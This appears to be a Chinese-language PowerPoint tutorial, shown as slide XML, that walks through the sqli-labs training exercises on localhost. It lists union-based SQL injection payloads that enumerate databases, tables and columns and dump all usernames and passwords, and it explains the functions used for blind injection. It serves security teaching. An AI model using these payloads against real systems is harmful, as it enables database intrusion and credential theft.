            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5. http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,schema_name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limit 4,1--+  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，或者是：   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,group_concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>schema_name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--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看所有的数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>6. http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,table_name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limit 1,1--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查表，或者是：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,group_concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>table_name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=0x7365637572697479--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看所有的表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>7. http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,column_name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=0x7573657273--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查询列信息，或者是：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,group_concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>column_name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=0x7573657273--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看所以的列信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>8. http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,concat_ws(’~‘,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>username,password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>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limit 1,1--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查询一个账号和密码，或者是：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,group_concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>concat_ws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(0x7e,username,password))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--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>直接可以得到所有的账号和密码，并且使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>符号进行分割。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30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0" y="484909"/>
            <a:ext cx="11319164" cy="5888182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http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/Less-2/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看是否有注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2.   http://127.0.0.1/sqli/Less-2/?id=1 order by 3--+   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看有多少列</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3.  http://127.0.0.1/sqli/Less-1/?id=-1 union select 1,2,3--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看哪些数据可以回显</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4. http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>schema_name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--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看所有数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5. http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>table_name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=0x7365637572697479 --+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看所有的表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>6.  http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>column_name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=0x7573657273 --+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看所有的列信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>7. http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>concat_ws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(0x7e,username,password))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--+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>直接可以得到所有的账号和密码，并且使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>符号进行分割。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561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0" y="484909"/>
            <a:ext cx="11596254" cy="5888182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http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/Less-3/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看是否有注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2. http://127.0.0.1/sqli/Less-3/?id=1') order by 3--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看有多少列</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3. http://127.0.0.1/sqli/Less-3/?id=-1')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schema_name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--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看所有数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>6. http://127.0.0.1/sqli/Less-3/?id=-1')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table_name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=0x7365637572697479 --+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看所有的表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>7. http://127.0.0.1/sqli/Less-3/?id=-1')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column_name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=0x7573657273 --+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看所有的列信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>8.  http://127.0.0.1/sqli/Less-3/?id=-1')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concat_ws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(0x7e,username,password))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--+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>直接可以得到所有的账号和密码，并且使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>符号进行分割。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436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348-F418-4D90-9A08-93CD3C2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138545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Less-4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C777-A87E-474D-8465-2E1A83E9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0" y="484909"/>
            <a:ext cx="11596254" cy="5888182"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. http://127.0.0.1/sqli/Less-4/?id=1"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看是否有注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2. http://127.0.0.1/sqli/Less-4/?id=1”) order by 3--+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看有多少列</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3. http://127.0.0.1/sqli/Less-4/?id=-1")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schema_name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information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> --+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看所有数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>6. http://127.0.0.1/sqli/Less-4/?id=-1")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table_name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=0x7365637572697479 --+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看所有的表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>7. http://127.0.0.1/sqli/Less-4/?id=-1")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column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)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=0x7573657273 --+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看所有的列信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>8. http://127.0.0.1/sqli/Less-4/?id=-1") union select 1,2, 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en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>concat_ws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(0x7e,username,password)) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>security.users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> --+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>直接可以得到所有的账号和密码，并且使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>符号进行分割。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67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E55E5-9470-4AE6-8061-116C9A0D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7307"/>
            <a:ext cx="10131425" cy="30374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补充基础知识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1CA6E-6503-4086-A431-31ECD5ECA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651164"/>
            <a:ext cx="11693236" cy="5997965"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. left()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数：  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>left(database(),1)=‘s’                     left(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从左侧截取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>位，正确则返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，错误则返回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regexp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>select user() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>regexp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> ‘r’                 user()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的结果是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>regexp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>为匹配</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的正则表达式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3. like</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>select user() like ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>%’                        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>匹配与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>regexp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>相似。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substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>a,b,c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)   select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>() XXXX                       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>a,b,c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>从位置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>开始，截取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字符串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>位长度</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5. ascii()  								    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>将某个字符串转化为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>值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chr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数字</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或者是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ord</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字母</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’)    </a:t>
            </a:r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中的两个函数可以判断当前的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>值是多少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security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据库：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> select left(database(),1)=‘s’;   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>位是否是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select database() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>regexp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> ‘s’;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>匹配第一个字符是否是 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select database() like ‘s%’;     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>匹配第一个字符是否是 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 select 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database()),1,1)='s’; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>匹配第一个字符是否是 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 select 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database()),1,3)= ‘sec’; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>匹配前三个个字符是否是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>sec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  select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database()),1,1));    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>直接回显</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>115  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或者是：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> select ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>((select database()),1,1)) &gt; 110;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如果大于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>110</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，就会返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，否则返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/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2945503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12732</TotalTime>
  <Words>5386</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>273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Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>天体</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>参考必读</vt:lpstr>
      <vt:lpstr>Sqli-labs、phpstudy下载和安装</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Less-1</vt:lpstr>
      <vt:lpstr>Less-2</vt:lpstr>
      <vt:lpstr>Less-3</vt:lpstr>
      <vt:lpstr>Less-4</vt:lpstr>
      <vt:lpstr>补充基础知识</vt:lpstr>
      <vt:lpstr>Less-5 bool型-1</vt:lpstr>
      <vt:lpstr>Less-5 bool型-2</vt:lpstr>
      <vt:lpstr>Less-6</vt:lpstr>
      <vt:lpstr>补充基础知识</vt:lpstr>
      <vt:lpstr>Less-7</vt:lpstr>
      <vt:lpstr>Less-8_01 法一 布尔盲注</vt:lpstr>
      <vt:lpstr>Less-8_02 法一 布尔盲注</vt:lpstr>
      <vt:lpstr>补充知识</vt:lpstr>
      <vt:lpstr>Less-8_01 法二  时间盲注</vt:lpstr>
      <vt:lpstr>Less-9</vt:lpstr>
      <vt:lpstr>Less-10</vt:lpstr>
      <vt:lpstr>tips</vt:lpstr>
      <vt:lpstr>Less-11_01</vt:lpstr>
      <vt:lpstr>Less-11_02</vt:lpstr>
      <vt:lpstr>Less-12_01</vt:lpstr>
      <vt:lpstr>Less-12_02</vt:lpstr>
      <vt:lpstr>Less-13_01</vt:lpstr>
      <vt:lpstr>Less-13_02</vt:lpstr>
      <vt:lpstr>Less-14</vt:lpstr>
      <vt:lpstr>Less-15</vt:lpstr>
      <vt:lpstr>Less-16</vt:lpstr>
      <vt:lpstr>补充知识</vt:lpstr>
      <vt:lpstr>Less-17</vt:lpstr>
      <vt:lpstr>Less-18</vt:lpstr>
      <vt:lpstr>Less-19</vt:lpstr>
      <vt:lpstr>Less-20</vt:lpstr>
      <vt:lpstr>Less-21</vt:lpstr>
      <vt:lpstr>Less-22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crow</cp:lastModifiedBy>
  <cp:revision>376</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-06-18T11:44:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-09-23T15:06:19Z</dcterms:modified>
</cp:coreProperties>
</file>